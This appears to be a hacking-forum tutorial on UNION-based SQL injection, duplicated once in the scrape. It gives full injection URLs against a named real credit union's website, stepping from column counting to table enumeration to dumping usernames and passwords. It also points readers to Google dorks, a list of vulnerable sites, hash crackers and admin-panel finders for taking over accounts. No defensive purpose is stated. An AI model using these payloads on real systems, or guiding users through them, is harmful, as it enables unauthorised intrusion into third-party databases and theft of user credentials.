SQL Injection For Beginners
SQL Injection For Beginners
So, someone asked me to make this, so here it is...lol
A few other ones that I seen weren't so great, or explained in detail, so I'll give it a shot.
I won't go into detail on what SQLi is, you can google that for yourself.
Starting Off
First off, you need to find a vulnerable site. Easy ways to find vulnerable sites is to use google dorks, or you can use a ready made list of sites.
Here's a list of dorks, and some vulnerable sites.
Google Dorks
21k Vulnerable Sites
So after you got a vulnerable site, to test if you can inject, add a ' to the end of the url.
I'll be using this site
As you can see, it loads perfectly fine, with no error. Now to see if it's vulnerable, add a ' to the end, so it should look like this.
Now you should get an error that looks like this.
Finding The Amount Of Columns
Now that you found a vulnerable site, you need to find the amount of columns.
You can do this by using the "Order By" function. We'll start by guessing at 5.
So take your url, and remove the ' from the end of it, and add +order+by+5--
Your link should now look like this:
As you can see, it loads perfectly fine, so you're going to want to increase it until you get an error that says "Unknown column '(Column Count Here)' in 'order clause'".
It looks like this:
So now that you got your error, you're going to want to decrease until you get a perfectly loaded page.
I got the error at
so I'm going to try
So my link looks like this now, and loads perfectly fine.
Finding Vulnerable Columns
So now that you got the amount of columns, you're going to want to see which ones you can get data from.
You do this by using the "Union+Select" or "Union+All+Select" Function. First, you add a - in front of your ID Number.
It should look like this:
Or, instead, you can change the number to null, since that's what the - is doing.
Then you want to use the Union Select function, so you add +union+select+(Column Count Here)--
So for each column, you add it.
My link now looks like this:
Now the site looks like this, so we know that 2,3, and 4 are vulnerable columns.
Getting MySQL Version
First off, we want it to be 5 or more. If it was less than 5, you would use error based injection (I won't cover that).
So pick one of your vulnerable columns, and replace it with either:
Or
I'm gonna use column 2, so now my link looks like this..
And my page looks like this..
Getting Table Names
Now that we got our version, we want to get our tables from the database.
Do this by using a few functions.
So pick a vulnerable column, and replace it with group_concat(table_name).
Then you want to add +from+information_schema.tables after your column count, and +where+table_schema=database()--
Your link should look something like this.
And your site should now display the tables from the database.
As you can see, it looks all fucked up..in order to fix that, you can add 0x0a after table_name in your brackets, which means New Line.
So my link looks like this:
And, the site doesn't look all fucked up anymore <3
Now as you see, we have a table called users, and that's what we want.
Getting Columns Out Of Tables
To do this, we use a few more functions similar to finding tables.
So now my link looks like this...
Unfortunately, we get an error. To bypass this, convert your table name into ASCII value.
The ASCII value of users looks something like this:
To get the ASCII value, you can use this site HERE
Or, you can do it with SQL Poizon that I posted HERE
It's on the injection builder tab.
So now my link looks like this:
And the site looks like this:
As you can see, we have some important columns there...now we want to get the data from them.
Getting Data From Columns
Ok, so I see ID, username, and password, and that's what I want.
Now, we just replace a few things.
My link now looks like this:
So lets break that down a bit...
The 0x0a means New Line, as I said earlier, and 0x3a means colon.
So I added 0x3a after ID, and username, so it should look something like this.
ID:Username:Password
Instead of using +from+information_schema.tables or +from+information_schem*****lumns, we just want it from the users table.
So we do +from+users--
So, my finished link looks like this:
And finally, the site looks like this:
Conclusion
As you can see, theres a username called admin. Now you can say to yourself "Fuck yeah bitch, I got your fucking login".
Hold up, it's not that easy...almost everytime, the passwords are encrpyted one way or another, whether it's MD5, SHA1, Base64, and others....
You can attempt to crack them using a few sites, here's one that I use.
MD5Decrypter
HashChecker
Now you need to find the admin control panel, where you can login and do what the fuck you want...
Here's an online one that I use...
OutLaws Admin Finder
Admin Page Finder
HaviJ also has a password cracker and admin page finder.
Hope you guys understand it, if not, feel free to PM/VM
A few other ones that I seen weren't so great, or explained in detail, so I'll give it a shot.
I won't go into detail on what SQLi is, you can google that for yourself.
Starting Off
First off, you need to find a vulnerable site. Easy ways to find vulnerable sites is to use google dorks, or you can use a ready made list of sites.
Here's a list of dorks, and some vulnerable sites.
Google Dorks
21k Vulnerable Sites
So after you got a vulnerable site, to test if you can inject, add a ' to the end of the url.
I'll be using this site
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12'
Finding The Amount Of Columns
Now that you found a vulnerable site, you need to find the amount of columns.
You can do this by using the "Order By" function. We'll start by guessing at 5.
So take your url, and remove the ' from the end of it, and add +order+by+5--
Your link should now look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+5--
It looks like this:
So now that you got your error, you're going to want to decrease until you get a perfectly loaded page.
I got the error at
Code:
+order+by+14--
Code:
+order+by+13--
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+13--
Finding Vulnerable Columns
So now that you got the amount of columns, you're going to want to see which ones you can get data from.
You do this by using the "Union+Select" or "Union+All+Select" Function. First, you add a - in front of your ID Number.
It should look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=-12
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null
So for each column, you add it.
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Getting MySQL Version
First off, we want it to be 5 or more. If it was less than 5, you would use error based injection (I won't cover that).
So pick one of your vulnerable columns, and replace it with either:
Code:
@@Version
Code:
version()
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,@@Version,3,4,5,6,7,8,9,10,11,12,13--
Getting Table Names
Now that we got our version, we want to get our tables from the database.
Do this by using a few functions.
Code:
group_concat(table_name)
Code:
from+information_schema.tables
Code:
+where+table_schema=database()--
Then you want to add +from+information_schema.tables after your column count, and +where+table_schema=database()--
Your link should look something like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--
As you can see, it looks all fucked up..in order to fix that, you can add 0x0a after table_name in your brackets, which means New Line.
So my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--
Now as you see, we have a table called users, and that's what we want.
Getting Columns Out Of Tables
To do this, we use a few more functions similar to finding tables.
Code:
group_concat(column_name)
Code:
information_schem*****lumns
Code:
where+table_name="TABLE NAME HERE"
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schem*****lumns+where+table_name="users"--
The ASCII value of users looks something like this:
Code:
char(117,115,101,114,115)
Or, you can do it with SQL Poizon that I posted HERE
It's on the injection builder tab.
So now my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schem*****lumns+where+table_name=char(117,115,101,114,115)--
As you can see, we have some important columns there...now we want to get the data from them.
Getting Data From Columns
Ok, so I see ID, username, and password, and that's what I want.
Now, we just replace a few things.
Code:
group_concat(ID,0x3a,username,0x3a,password,0x0a)
Code:
from+Table Name Here
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
The 0x0a means New Line, as I said earlier, and 0x3a means colon.
So I added 0x3a after ID, and username, so it should look something like this.
ID:Username:Password
Instead of using +from+information_schema.tables or +from+information_schem*****lumns, we just want it from the users table.
So we do +from+users--
So, my finished link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
Conclusion
As you can see, theres a username called admin. Now you can say to yourself "Fuck yeah bitch, I got your fucking login".
Hold up, it's not that easy...almost everytime, the passwords are encrpyted one way or another, whether it's MD5, SHA1, Base64, and others....
You can attempt to crack them using a few sites, here's one that I use.
MD5Decrypter
HashChecker
Now you need to find the admin control panel, where you can login and do what the fuck you want...
Here's an online one that I use...
OutLaws Admin Finder
Admin Page Finder
HaviJ also has a password cracker and admin page finder.
Hope you guys understand it, if not, feel free to PM/VM
Similar Threads
- 9Last post
- 0Last post
- 22Last post
Originally Posted by ParkYongLee
